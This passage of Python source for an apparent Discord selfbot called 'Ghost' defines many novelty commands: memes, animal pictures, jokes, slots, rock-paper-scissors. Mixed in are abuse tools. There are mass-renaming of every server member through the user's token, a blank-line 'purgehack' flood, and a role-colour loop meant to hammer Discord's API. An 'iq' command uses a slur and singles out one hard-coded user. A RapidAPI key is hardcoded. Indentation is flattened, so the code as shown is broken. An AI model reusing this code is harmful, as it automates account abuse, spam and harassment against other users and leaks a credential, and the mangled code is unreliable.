embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="rickroll", description="Send never gonna give you up lyrics one by one.", usage="rickroll")
async def rickroll(ctx):
global rickRollEnabled
rickRollEnabled = True
async def sendLyrics():
file1 = open('data/rickroll.txt', 'r')
Lines = file1.readlines()
for line in Lines:
if rickRollEnabled == True:
await ctx.send(line)
await asyncio.sleep(1)
else:
return
Ghost.loop.create_task(sendLyrics())
@Ghost.command(name="stoprickroll", description="Stop sending rick astley lyrics.", usage="stoprickroll")
async def stoprickroll(ctx):
global rickRollEnabled
rickRollEnabled = False
@Ghost.command(name="suggest", description="Suggest something.", usage="suggest [suggestion]")
async def suggest(ctx, *, suggestion):
if __embedmode__:
embed = discord.Embed(title="Suggestion", description=suggestion, colour=__embedcolour__)
embed.set_footer(text=ctx.author.name + " suggested.", icon_url=ctx.author.avatar_url)
embed.timestamp = datetime.now()
msg = await ctx.send(embed=embed)
else:
msg = await ctx.send(f"""```ini
[ Suggestion ]
{suggestion}
# {ctx.author.name} suggested.```""", delete_after=__deletetimeout__)
await msg.add_reaction('\U0001F44D')
await msg.add_reaction('\U0001F44E')
@Ghost.command(name="massnick", description="Change the nickname of all members in the command server.", usage="massnick [nickname]", aliases=["massnickname", "masschangenickname"])
async def massnick(ctx, *, nickname):
if __riskmode__:
try:
await ctx.message.delete()
except:
pass
bot = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
def close_after_fetching(resp, guild_id):
if bot.gateway.finishedMemberFetching(guild_id):
print_info("Fetching complete.")
members = bot.gateway.session.guild(guild_id).members
bot.gateway.removeCommand({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.close()
print_info(f"Fetched a total of {len(members)} members.")
return members
def get_members(guild_id, channel_id):
print_info("Fetching members...")
bot.gateway.fetchMembers(guild_id, channel_id, keep="all", wait=1)
bot.gateway.command({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.run()
bot.gateway.resetSession()
return bot.gateway.session.guild(guild_id).members
members = get_members(str(ctx.guild.id), str(ctx.channel.id))
for member in members:
try:
member = await ctx.guild.fetch_member(int(member))
await member.edit(nick=nickname)
await asyncio.sleep(1)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="massunnick", description="Reset the nickname of all members in the command server.", usage="massunnick", aliases=["massremovenickname", "massunnickname"])
async def massunnick(ctx):
try:
await ctx.message.delete()
except:
pass
bot = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
def close_after_fetching(resp, guild_id):
if bot.gateway.finishedMemberFetching(guild_id):
print_info("Fetching complete.")
members = bot.gateway.session.guild(guild_id).members
bot.gateway.removeCommand({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.close()
print_info(f"Fetched a total of {len(members)} members.")
return members
def get_members(guild_id, channel_id):
print_info("Fetching members...")
bot.gateway.fetchMembers(guild_id, channel_id, keep="all", wait=1)
bot.gateway.command({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.run()
bot.gateway.resetSession()
return bot.gateway.session.guild(guild_id).members
members = get_members(str(ctx.guild.id), str(ctx.channel.id))
for member in members:
try:
member = await ctx.guild.fetch_member(int(member))
await member.edit(nick="")
await asyncio.sleep(1)
except:
pass
@Ghost.command(name="dadjoke", description="A random dad joke.", usage="dadjoke", aliases=["fuckofftypefunny"])
async def dadjoke(ctx):
url = "https://icanhazdadjoke.com/"
payload={}
headers = {
'Accept': 'text/plain',
'Cookie': '__cfduid=d6dccebb48b09fdeb9a97022fa2f292811612029832'
}
response = requests.request("GET", url, headers=headers, data=payload)
if __embedmode__:
embed = discord.Embed(description=response.text, colour=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(response.text)
@Ghost.command(name="randomquestion", description="A random question.", usage="randomquestion", aliases=["ranquestion"])
async def randomquestion(ctx):
question = requests.get("https://nekos.life/api/v2/why").json()["why"]
if __embedmode__:
embed = discord.Embed(description=question, colour=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(question)
@Ghost.command(name="randommessage", description="A random message.", usage="randommessage", aliases=["ranmessage", "ranmsg",])
async def randommessage(ctx):
url = "https://ajith-messages.p.rapidapi.com/getMsgs"
querystring = {"category":"Random"}
headers = {
'x-rapidapi-key': "01eddf9d3cmsh5207aa226152e38p1f5a60jsn182a112b106d",
'x-rapidapi-host': "ajith-messages.p.rapidapi.com"
}
response = requests.request("GET", url, headers=headers, params=querystring)
response_data = response.json()
if __embedmode__:
embed = discord.Embed(description=response_data["Message"], colour=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(response_data["Message"])
@Ghost.command(name="meme", description="A random meme.", usage="meme", aliases=["randommeme", "ranmeme"])
async def meme(ctx):
response = requests.get("https://meme-api.herokuapp.com/gimme")
data = response.json()
if __embedmode__:
embed = discord.Embed(title=data["title"], url=data["postLink"], colour=__embedcolour__)
embed.set_image(url=data["url"])
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_author(name=f"u/{data['author']}", url=f"https://reddit.com/u/{data['author']}")
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(data["title"] + "\n" + data["url"])
@Ghost.command(name="gif", description="Search for a gif.", usage="gif [search]", aliases=["searchgif"])
async def gif(ctx, *, search):
if CONFIG["api_keys"]["tenor"] == "":
if __embedmode__:
embed = discord.Embed(description="This command requires a tenor API key.", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send("This command requires a tenor API key.\nVisit <https://tenor.com/developer/keyregistration> for registration")
else:
search = search.replace(" ", "+")
response = requests.get(f'https://g.tenor.com/v1/search?q={search}&key={CONFIG["api_keys"]["tenor"]}&limit=10000')
data = response.json()
#print(data['results'][0]["media"][0]["gif"]["url"])
if __embedmode__:
embed = discord.Embed(title=f"{search.replace('+', ' ')}", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url=data['results'][random.randint(0, 49)]["media"][0]["gif"]["url"])
await ctx.send(embed=embed)
else:
await ctx.send(data['results'][random.randint(0, 49)]["media"][0]["gif"]["url"])
@Ghost.command(name="cat", description="A random cat image.", usage="cat", aliases=["randomcat", "rancat"])
async def cat(ctx):
request = requests.get("https://cataas.com/cat?json=true").json()
image = "https://cataas.com" + request["url"]
if __embedmode__:
embed = discord.Embed(title="meow", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url=image)
await ctx.send(embed=embed)
else:
await ctx.send(image)
@Ghost.command(name="catgif", description="A random cat gif.", usage="catgif", aliases=["randomcatgif", "rancatgif"])
async def catgif(ctx):
request = requests.get("https://cataas.com/cat/gif?json=true").json()
image = "https://cataas.com" + request["url"]
if __embedmode__:
embed = discord.Embed(title="meow", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url=image)
await ctx.send(embed=embed)
else:
await ctx.send(image)
@Ghost.command(name="dog", description="A random dog image.", usage="dog", aliases=["randomdog", "randog"])
async def dog(ctx):
response = requests.get('https://dog.ceo/api/breeds/image/random')
data = response.json()
if __embedmode__:
embed = discord.Embed(title="woof", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url=data['message'])
await ctx.send(embed=embed)
else:
await ctx.send(data['message'])
@Ghost.command(name="shiba", description="A random shiba image.", usage="shiba", aliases=["randomshiba", "ranshiba"])
async def shiba(ctx):
response = requests.get('https://shibe.online/api/shibes?count=1&httpsUrls=true')
data = response.json()
if __embedmode__:
embed = discord.Embed(title="shiba", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url=data[0])
await ctx.send(embed=embed)
else:
await ctx.send(data[0])
@Ghost.command(name="fox", description="A random fox image. (Thanks drag#6311 for fixing it :/)", usage="fox", aliases=["randomfox", "ranfox"])
async def fox(ctx):
response = requests.get('https://randomfox.ca/floof/')
data = response.json()
if __embedmode__:
embed = discord.Embed(title="fox", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url=data['image'])
await ctx.send(embed=embed)
else:
await ctx.send(data['image'])
@Ghost.command(name="achievement", description="Create a fake minecraft achievement image.", usage='achievement ["text"] (icon)', aliases=["minecraftachievement", "mcachievement"])
async def achievement(ctx, text, icon=10):
icon = str(icon)
text = text.replace(" ", "+")
image = requests.get(f"http://timbw.ddns.net:5000/achievement?text={text}&icon={icon}")
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@Ghost.command(name="challenge", description="Create a fake minecraft challenge image.", usage='challenge ["text"] (icon)', aliases=["minecraftchallenge", "mcchallenge"])
async def challenge(ctx, text, icon=33):
text = text.replace(" ", "+")
image = requests.get(f"http://timbw.ddns.net:5000/challenge?text={text}&icon={icon}")
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@Ghost.command(name="captcha", description="Create a fake reCaptcha.", usage="captcha [text]", aliases=["fakecaptcha"])
async def captcha(ctx, *, text):
text = text.replace(" ", "+")
image = requests.get(f"http://timbw.ddns.net:5000/captcha?text={text}")
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@Ghost.command(name="amiajoke", description="Make a user a joke.", usage="amiajoke [@user]", aliases=["amiajoketoyou"])
async def amiajoke(ctx, user:discord.User):
imageurl = avatarUrl(user.id, user.avatar)
image = requests.get(f"http://timbw.ddns.net:5000/amiajoke?image={imageurl}")
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@Ghost.command(name="didyoumean", description="Create a google did you mean image.", usage='didyoumean ["text 1"] ["text 2"]', aliases=["googledidyoumean"])
async def didyoumean(ctx, text1="Nighty", text2="Ghost"):
text1 = text1.replace(" ", "+")
text2 = text2.replace(" ", "+")
image = requests.get(f"http://timbw.ddns.net:5000/didyoumean?top={text1}&bottom={text2}")
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@Ghost.command(name="drake", description="Create a drake meme image.", usage='drake ["text 1"] ["text 2"]', aliases=["drakememe"])
async def drake(ctx, text1="Nighty Selfbot", text2="Ghost Selfbot"):
text1 = text1.replace(" ", "+")
text2 = text2.replace(" ", "+")
image = requests.get(f"http://timbw.ddns.net:5000/drake?top={text1}&bottom={text2}")
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@Ghost.command(name="facts", description="Create a facts meme image.", usage='facts [text]', aliases=["factsmeme"])
async def facts(ctx, *, text):
text = text.replace(" ", "+")
image = requests.get(f"http://timbw.ddns.net:5000/facts?text={text}")
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@Ghost.command(name="jokeoverhead", description="Create a joke over head image.", usage="jokeoverhead [image url]")
async def jokeoverhead(ctx, *, imageurl):
image = requests.get(f"http://timbw.ddns.net:5000/jokeoverhead?image={imageurl}")
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@Ghost.command(name="pornhub", description="Create a pornhub logo image.", usage='pornhub ["text 1"] ["text 2"]', aliases=["phub"])
async def pornhub(ctx, text1="Ghost", text2="Selfbot"):
text1 = text1.replace(" ", "+")
text2 = text2.replace(" ", "+")
image = requests.get(f"http://timbw.ddns.net:5000/pornhub?text={text1}&text2={text2}")
    with open("image.png", "wb") as imageFile:
        imageFile.write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@Ghost.command(name="salty", description="Make someone salty.", usage="salty [@user]")
async def salty(ctx, user: discord.User):
imageurl = avatarUrl(user.id, user.avatar)
image = requests.get(f"http://timbw.ddns.net:5000/salty?image={imageurl}")
    with open("image.png", "wb") as imageFile:
        imageFile.write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@Ghost.command(name="ship", description="Ship two people.", usage="ship [@user 1] [@user 2]")
async def ship(ctx, user1:discord.User, user2:discord.User):
user1 = avatarUrl(user1.id, user1.avatar)
user2 = avatarUrl(user2.id, user2.avatar)
image = requests.get(f"http://timbw.ddns.net:5000/ship?user={user1}&user2={user2}")
    with open("image.png", "wb") as imageFile:
        imageFile.write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@Ghost.command(name="trash", description="Put someone in the trash.", usage='trash [@user]')
async def trash(ctx, user: discord.User):
trash = avatarUrl(user.id, user.avatar)
face = avatarUrl(Ghost.user.id, Ghost.user.avatar)
image = requests.get(f"http://timbw.ddns.net:5000/trash?trash={trash}&face={face}")
    with open("image.png", "wb") as imageFile:
        imageFile.write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@Ghost.command(name="what", description="Make a what meme.", usage='what [image url]')
async def what(ctx, *, imageurl):
image = requests.get(f"http://timbw.ddns.net:5000/what?image={imageurl}")
    with open("image.png", "wb") as imageFile:
        imageFile.write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@Ghost.command(name="minion", description="Get a minion meme with bennys api", usage='minion')
async def minion(ctx):
response = requests.get('https://api.benny.fun/v1/minion')
data = response.json()
await ctx.send(data['minion'])
@Ghost.command(name="communism", description="Turns a user into a communist with bennys api", usage='communism [@user]')
async def communism(ctx, user: discord.User):
communist = avatarUrl(user.id, user.avatar)
image = requests.get(f'https://api.benny.fun/v1/communism?image={communist}')
    with open("communism.png", "wb") as imageFile:
        imageFile.write(image.content)
file = discord.File("communism.png", filename="communism.png")
await ctx.send(file=file)
os.remove("communism.png")
@Ghost.command(name="bad", description="Tells a user hes bad.", usage="bad [@user]")
async def bad(ctx, user: discord.User):
bad = avatarUrl(user.id, user.avatar)
image=requests.get(f'https://api.benny.fun/v1/bad?image={bad}')
    with open("bad.png", "wb") as imageFile:
        imageFile.write(image.content)
file = discord.File("bad.png", filename="bad.png")
await ctx.send(file=file)
os.remove("bad.png")
@Ghost.command(name="fml", description="Sends a random persons message who hates their life", usage="fml")
async def fml(ctx):
response = requests.get('https://api.benny.fun/v1/fml')
data = response.json()
await ctx.send(f"""
```Posted by {data['author']}
FML
{data['text']}```""")
@Ghost.command(name="purgehack", description="Purge without permissions.", usage="purgehack")
async def purgehack(ctx):
await ctx.send(f"** **\n"*100)
@Ghost.command(name="iq", description="Check how smart a user is.", usage="iq [@user]", aliases=["iqcheck"])
async def iq(ctx, user: discord.User):
iq = random.randint(45, 135)
smart = ""
if user.id == 858034873415368715:
iq = 45
    if iq >= 90:
        smart = "They're very smart!"
    elif iq >= 70:
        smart = "They're just below average."
    elif iq >= 50:
        smart = "They might have some issues."
    else:
        smart = "They're severely retarded."
if __embedmode__:
embed = discord.Embed(title=f"{user.name}'s iq is `{iq}`.", description=f"{smart}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"{user}'s iq is `{iq}`. {smart}")
@Ghost.command(name="howskid", description="Check the percentage of a skid.", usage="howskid [item]")
async def howskid(ctx, *, item):
percentage = random.randint(0, 100)
if __embedmode__:
embed = discord.Embed(title="Skid Detection", description=f"{item} is {percentage}% skidded!", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"`{item}` is {percentage}% skidded!")
@Ghost.command(name="halal", description="Check if a user is halal or haram.", usage="halal [@user]", aliases=["haram"])
async def halal(ctx, user: discord.User):
halalius = random.choice("halal haram".split())
if __embedmode__:
embed = discord.Embed(title="Halal or Haram?", description=f"{user.mention} is {halalius}!", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"{user.mention} is {halalius}!")
@Ghost.command(name="howgay", description="How gay a user is.", usage="howgay [@user]", aliases=["gaycheck"])
async def howgay(ctx, user: discord.User):
percentage = str(random.randint(15, 100)) + "%"
if __embedmode__:
embed = discord.Embed(title=f"🏳️🌈 {user.name} is {percentage} gay", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"🏳️🌈 {user} is {percentage} gay")
@Ghost.command(name="slots", description="Play the slot machine.", usage="slots", aliases=["gamble"])
async def slots(ctx):
if __embedmode__:
embed = discord.Embed(title=f"Slots", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
message = await ctx.send(embed=embed)
else:
message = await ctx.send(f"""```ini
[ Slots ]
# {__embedfooter__}
```""")
emojis = [("🍒", 0.01), ("🍊", 0.02), ("🍎", 0.06), ("💎", 0.08), ("🍆", 0.14), ("🍉", 0.24), ("🎰", 0.36)]
emojis2 = []
for emoji, probability in emojis:
emojis2 += emoji*int(probability*100)
async def game():
amount = 8
delay = 0.5
dots = "."
reel_1 = ""
reel_2 = ""
reel_3 = ""
final_reel = ""
for _ in range(amount):
delay += 0.02
dots += "."
if dots == "....":
dots = "."
reel_1 = random.choice(emojis2)
reel_2 = random.choice(emojis2)
reel_3 = random.choice(emojis2)
final_reel = reel_1 + " | " + reel_2 + " | " + reel_3
if __embedmode__:
embed = discord.Embed(title=f"Spinning{dots}", description=final_reel, color=__embedcolour__)
embed.timestamp = datetime.now()
await message.edit(content="", embed=embed)
else:
await message.edit(content=f"""```ini
[ Spinning{dots} ]
{final_reel}
# {__embedfooter__}
```""")
await asyncio.sleep(delay)
if reel_1 == reel_2 and reel_1 == reel_3 and reel_2 == reel_3:
if __embedmode__:
embed = discord.Embed(title=f"You won!", description=final_reel, color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await message.edit(content="", embed=embed)
else:
await message.edit(content=f"""```ini
[ You won! ]
{final_reel}
# {__embedfooter__}
```""")
else:
if __embedmode__:
embed = discord.Embed(title=f"You lost ;(", description=final_reel, color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await message.edit(content="", embed=embed)
else:
await message.edit(content=f"""```ini
[ You lost ;( ]
{final_reel}
# {__embedfooter__}
```""")
await game()
@Ghost.command(name="socialcredit", description="A users social credit score.", usage="socialcredit [@user]", aliases=["socialcreditcheck"])
async def socialcredit(ctx, user: discord.User):
credit = random.randint(-5000000, 10000000)
if __embedmode__:
embed = discord.Embed(description=f"{user.name}'s social credit score is {credit}", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"{user.name}'s social credit score is {credit}")
@Ghost.command(name="roast", description="Roast a user.", usage="roast [@user]", aliases=["insult"])
async def roast(ctx, user: discord.User):
insult = requests.get("https://evilinsult.com/generate_insult.php?lang=en&type=json").json()["insult"]
if __embedmode__:
embed = discord.Embed(description=insult, colour=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(user.mention, embed=embed)
else:
await ctx.send(f"Ayo {user.mention}, " + str(insult).lower())
@Ghost.command(name="yomomma", description="Random yo momma joke.", usage="yomomma", aliases=["mom", "mum", "yomom"])
async def yomomma(ctx):
joke = requests.get("https://api.yomomma.info/").json()["joke"]
if __embedmode__:
embed = discord.Embed(description=joke, colour=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(joke)
@Ghost.command(name="fakeedited", description='"Edit" a message.', usage="fakeedited [message]", aliases=["edited"])
async def fakeedited(ctx, *, message):
msg = await ctx.send(message)
await msg.edit(content=message + " hehe")
await msg.edit(content=message)
@Ghost.command(name="pp", description="The length of a user's penis.", usage="pp (@user)", aliases=["dicksize", "cocksize", "penissize", "predictpenileprotractedness"])
async def pp(ctx, user: discord.User = None):
size = "8" + "="*random.randint(1, 12) + "D"
if user is None:
if __embedmode__:
embed = discord.Embed(title=f"{Ghost.user.name}'s pp is {size}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"{Ghost.user.name}'s pp size\n{size}")
else:
if __embedmode__:
embed = discord.Embed(title=f"{user.name}'s pp is {size}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"{user.name}'s pp size\n{size}")
# @Ghost.command(name="trumptweet", description="Make Donald Trump tweet anything.", usage="trumptweet [tweet]")
# async def trumptweet(ctx, *, tweet):
# img = Image.open("trump-tweets/assets/bg.png")
# draw = ImageDraw.Draw(img)
# font = ImageFont.truetype('trump-tweets/assets/roboto.ttf', 30)
# draw.text((39, 123),f"{tweet}",(0,0,0),font=font)
# randomnum = random.randint(1000, 9999)
# img.save(f'trump-tweets/{randomnum}.png')
# file = discord.File(f'trump-tweets/{randomnum}.png')
# try:
# embed = discord.Embed(title='Trump Tweeted...', color=__embedcolour__)
# embed.set_image(url=f'attachment://{randomnum}.png')
# embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
# embed.timestamp = datetime.now()
# await ctx.send(file=file, embed=embed)
# except discord.HTTPException:
# await ctx.send(file=file)
@Ghost.command(name="rainbowrole", description="Kill Discord's API with a sexy rainbow role.", usage="rainbowrole [@role]")
async def rainbowrole(ctx, *, role: discord.Role):
oldcolour = role.color
red = Color("#ff3d3d")
pink = Color("#f54287")
rainbow = list(red.range_to(pink, 50))
if __embedmode__:
embed = discord.Embed(title=f"Rainbow Role", color=__embedcolour__, description=f"{role} now has a rainbow colour.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Rainbow Role ]
{role} now has a rainbow colour.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
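    # Cycle the role through the 50 interpolated colours five times, then restore its original colour.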
for _ in range(5):
for x in rainbow:
colour = f'{x}'
await role.edit(color=int(colour.replace('#', '0x'), 0))
await role.edit(color=oldcolour)
# @Ghost.command(name="rembed", description="Kill Discord's API with a sexy rainbow embedded message.", usage="rembed [text]", aliases=["rainbowembed"])
# async def rembed(ctx, *, text):
# if __embedmode__:
# red = Color("#ff3d3d")
# pink = Color("#f54287")
# rainbow = list(red.range_to(pink, 25))
# embed = discord.Embed(color=int("#ff3d3d".replace('#', '0x'), 0))
# embed.set_author(name=text)
# msg = await ctx.send(embed=embed)
# for _ in range(5):
# for x in rainbow:
# colour = f'{x}'
# newembed = discord.Embed(color=int(colour.replace('#', '0x'), 0))
# newembed.set_author(name=text)
# await msg.edit(embed=newembed)
# await msg.edit(embed=discord.Embed(color=int("#f54287".replace("#", "0x"), 0)).set_author(name=text))
# else:
# await ctx.send("This command can only be used in embed mode.")
@Ghost.command(name="coinflip", description="Flip a coin.", usage="coinflip", aliases=["flipacoin"])
async def coinflip(ctx):
choices = ["Heads", "Tails"]
choice = random.choice(choices)
if __embedmode__:
embed = discord.Embed(title=f"{choice}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(choice)
@Ghost.command(name="dice", description="Roll a dice.", usage="dice", aliases=["rolladice"])
async def dice(ctx, amnt: int=6):
result = str(random.randint(1, amnt))
await ctx.send(f"""
:game_die: `{amnt}`-sided dice
You rolled a `{result}`.""")
@Ghost.command(name="rps", description="Rock, paper, scissors.", usage="rps", aliases=["rockpaperscissors"])
async def rps(ctx, move = None):
if move is not None:
choices = ["Rock", "Paper", "Scissors"]
computer = random.choice(choices)
try:
try:
player = move
if player == computer:
e = discord.Embed(title=f'Tie!', description=f'We chose the same!', color=__embedcolour__)
elif player == 'Rock' and computer == 'Scissors':
e = discord.Embed(title=f'Player wins!', description=f'{player} smashes {computer}!', color=__embedcolour__)
elif player == 'Rock' and computer == 'Paper':
e = discord.Embed(title=f'Computer wins!', description=f'{computer} covers {player}!', color=__embedcolour__)
elif player == 'Paper' and computer == 'Rock':
e = discord.Embed(title=f'Player wins!', description=f'{player} covers {computer}!', color=__embedcolour__)
elif player == 'Paper' and computer == 'Scissors':
e = discord.Embed(title=f'Computer wins!', description=f'{computer} cuts {player}!', color=__embedcolour__)
elif player == 'Scissors' and computer == 'Paper':
